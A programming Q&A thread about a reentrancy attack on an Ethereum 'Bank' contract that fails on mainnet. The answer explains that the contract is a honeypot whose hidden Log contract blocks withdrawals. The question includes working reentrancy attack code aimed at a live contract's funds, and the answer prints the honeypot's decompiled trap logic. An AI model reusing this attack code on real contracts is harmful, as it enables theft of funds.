# Reentrancy attack not working on mainnet, but working on ropsten and remix VM

Tags: solidity, reentrant-attacks

I was fullfilling a reentrancy attack on a contract.
I tested it in remix VM first and later on with deployed contract on ropsten testnet. Both worked well without any errors.
On the mainnet it turned out that the attack transaction always fails.

Here is an example of the Honeypot collecting function:

```
(contract Bank)

function Collect(uint _amount)
    public
    payable
    {
        var acc = Acc[msg.sender];
        if( acc.balance>=MinSum && acc.balance>=_am && now>acc.unlockTime)
        {
            if(msg.sender.call.value(_amount)())
            {
                acc.balance-=_amount;
                LogFile.AddMessage(msg.sender,_amount,"Collect");
            }
        }
    }
```

Account object look like this:

```
(contract Bank)

struct Holder   
    {
        uint unlockTime;
        uint balance;
    }

    mapping (address => Holder) public Acc;
```

My contract has put 1 ether to its account with this funtion:

```
(contract Bank)

function Put(uint _unlockTime)
    public
    payable
    {
        var acc = Acc[msg.sender];
        acc.balance += msg.value;
        acc.unlockTime = _unlockTime>now?_unlockTime:now;
        LogFile.AddMessage(msg.sender,msg.value,"Put");
    }

(contract Ripper)

function Put() public payable {
        bank_.Put.value(msg.value)(0);
    }
```

I am starting the attack with the Collect function, that sends me 1 ether:

```
(contract Ripper)

// DATASET
Bank private bank_ = Bank(0x...);

function Collect() public {
        bank_.Collect(1 ether);
    }
```

The Bank contract will send me 1 ether, so its now possible to start the attack with my contracts fallback funtion:

```
(contract Ripper)

function() payable public {
        if (address(bank_).balance >= msg.value) {
            bank_.Collect(1 ether);
        }
    }
```

After transaction execution the tx fails with standard error: Warning! Error encountered during contract execution [Reverted]
[[image]][1](https://i.stack.imgur.com/XRxhM.png)

**Do you have any clue why its working in Remix VM and on Ropsten testnet, but not on mainnet?**

Comment: Looks like you're using a constant address in `Bank private bank_ = Bank(0x...);`. Have you made sure to use the correct address when executing your transaction on mainnet?

Comment: Do you have a transaction hash we can examine? Does the contract have a lot of Ether? Ethereum has a recursion limit based on available gas https://eips.ethereum.org/EIPS/eip-150.

Comment: thanks for replying
@goodvibration yes the address is correct. The transaction tried to interact with the Bank contract.

Comment: @Ismael I do not want to post a tx hash bcs of anonymity. The contract has about 8.02 ETH, so after depositing 1 ETH, it should be called 9 times. I tried with exact same amount in bank contract on ropsten

Comment: Maybe something like Sereum (https://arxiv.org/pdf/1812.05934.pdf) was already implemented in all major ethereum nodes?

Comment: @sea212 I don't think so. It requires a fork also ropsten nodes run the same software.

Comment: @Ismael I can understand your rationale behind this, if it would be a consensus rule that such transactions are invalid, a fork would happen. On the other hand I have to disagree, because you can simply add this to the nodes as a weak rule. To be precise about that, nodes using such software would only deny the propagation of such transactions, but would accept a block which cointains those. This would work without any forks. Since the transaction was executed, this does not apply to this scenario. Therefore it cannot be something like Sereum which lead to the problem mentioned by Thurjen.

Comment: @sea212 With the assumption that nodes are weakly validating then they will reject malicious transaction before they are mined and accept them if they were mined. In that case your malicious transaction is either never mined or it will be mined successfully. From your screenshot it appears it was mined and failed. Without examining a concrete case we can only speculate what is happening.

Comment: It has something to do with the Log contract. When collecting ether ```LogFile.AddMessage(msg.sender,_amount,"Collect");``` gets called. The Log contract is not open source. I have testet it again with a cloned Bank contract that interacts with the original Log contract and it works pretty well. I could withdraw my ether without any problems and I could fulfill reentrancy too. How is it possible that the attack just doesn't work with the original Bank contract, even the Log contract got deployed before the Bank contract. The Log contract can't know the Bank address. And it was not set after.

Comment: I encountered same problem! The reentrancy example works well in VM of remix but not work on private chain! I do now why. I can deposit and withdraw to the victim contract, but can not make it re-enter in private chain!

Comment: Have you found solutions?

Answer (score 0):

The Log contract deployed on the mainnet does not match the code. It does something completely else. Decompile it using the link in Etherscan and possibly find the following code:

```
def storage:
  stor0 is array of struct at storage 0
  stor1 is addr at storage 1
  stor2 is array of uint256 at storage 2
  stor3 is uint256 at storage 3
  stor4 is uint256 at storage 4
  stor5 is addr at storage 5
  stor6 is addr at storage 6
  stor7 is addr at storage 7

  # ...

def AddMessage(address _adr, uint256 _val, string _data): # not payable

  # ...

  if caller == stor5:
      if stor7 != _adr:
          if stor6 != tx.origin:
              require 0 < _data.length
              if 'C' == Mask(8, 248, mem[128]):
                  require _val <= 0
```

This method only succeeds if the caller is the contract owner or if the amount is zero or less (means no withdrawal).

Always pay extreme caution if at least half of the following conditions are met. Don't be the next to learn it the expensive way.

- It costs significant amount to be able to execute withdrawal method (like 0.1 Ether and more)
- You found the contract randomly or in Verified Contracts search on Etherscan
- The contract has buggy compiler version (often 0.4.x)
- There are hidden internal transactions visible for example using bloxy.info but not on Etherscan (very important for quiz scams)
- The riddle is otherwise easy or moderate to solve properly
- Decompiled code does clearly different things than code shown on Etherscan (was this case)
- Previous movements of ether reveal repeated deployment of similar contracts and even evidence of properly executed but still failed attacks
- The contract contains some arbitrary functions (LogFile in this case)
- The contract contains some arbitrary conditions like withdrawal next block only or tx.origin == msg.sender to avoid flash loan attacks

As you can see, even testing in different testnets does not guarantee identical result. Use some mainnet fork tool like ganache-cli to test against live version of the contract.
There are many more honeypots utilizing various less or more hidden vulnerabilities pretending to have obvious ones. If this contract was even possible to hack, your transaction is likely to be overtaken by frontrunner bot.